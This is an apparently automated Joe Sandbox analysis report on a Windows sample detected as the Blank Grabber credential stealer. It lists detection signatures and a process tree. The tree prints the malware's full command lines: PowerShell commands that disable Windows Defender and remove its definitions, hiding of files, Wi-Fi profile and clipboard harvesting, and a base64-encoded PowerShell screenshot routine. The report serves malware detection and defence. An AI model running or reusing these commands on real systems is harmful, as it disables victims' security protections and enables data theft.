Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
KpHYfxnJs6.exe

Overview

General Information

Sample name:KpHYfxnJs6.exe
renamed because original name is a hash value
Original sample name:6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
Analysis ID:1584305
MD5:41b147fd16a94a8ea6164177cf91733c
SHA1:f586388782d636b286ef606de997087f451fe11f
SHA256:6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31
Tags:exeuser-zhuzhu0009
Infos:

Detection

Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
PE file contains section with special chars
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Removes signatures from Windows Defender
Self deletion via cmd or bat file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Ping/Del Command Combination
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • KpHYfxnJs6.exe (PID: 7320 cmdline: "C:\Users\user\Desktop\KpHYfxnJs6.exe" MD5: 41B147FD16A94A8EA6164177CF91733C)
    • KpHYfxnJs6.exe (PID: 7732 cmdline: "C:\Users\user\Desktop\KpHYfxnJs6.exe" MD5: 41B147FD16A94A8EA6164177CF91733C)
      • cmd.exe (PID: 7964 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8108 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 7972 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8152 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 7988 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mshta.exe (PID: 8168 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()" MD5: 06B02D5C097C7DB1F109749C45F3F505)
      • cmd.exe (PID: 8052 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 3668 cmdline: tasklist /FO LIST MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • cmd.exe (PID: 6960 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 4476 cmdline: wmic csproduct get uuid MD5: E2DE6500DE1148C7F6027AD50AC8B891)
      • cmd.exe (PID: 7560 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 2212 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • cmd.exe (PID: 1852 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7672 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • cmd.exe (PID: 7668 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 5924 cmdline: wmic path win32_VideoController get name MD5: E2DE6500DE1148C7F6027AD50AC8B891)
      • cmd.exe (PID: 3808 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 6384 cmdline: wmic path win32_VideoController get name MD5: E2DE6500DE1148C7F6027AD50AC8B891)
      • cmd.exe (PID: 6780 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\KpHYfxnJs6.exe"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 1888 cmdline: attrib +h +s "C:\Users\user\Desktop\KpHYfxnJs6.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • cmd.exe (PID: 6472 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1208 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 1640 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 984 cmdline: tasklist /FO LIST MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • cmd.exe (PID: 1784 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 2140 cmdline: tasklist /FO LIST MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • cmd.exe (PID: 3904 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 3888 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: E2DE6500DE1148C7F6027AD50AC8B891)
      • cmd.exe (PID: 4280 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2124 cmdline: powershell Get-Clipboard MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 3652 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 736 cmdline: tasklist /FO LIST MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • cmd.exe (PID: 3104 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7472 cmdline: tree /A /F MD5: 7E896B29B309DE74A72DEC7D59715EFD)
      • cmd.exe (PID: 7832 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 5088 cmdline: systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
      • cmd.exe (PID: 7492 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 4888 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • cmd.exe (PID: 5728 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 6352 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • cmd.exe (PID: 4588 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7048 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • csc.exe (PID: 8096 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
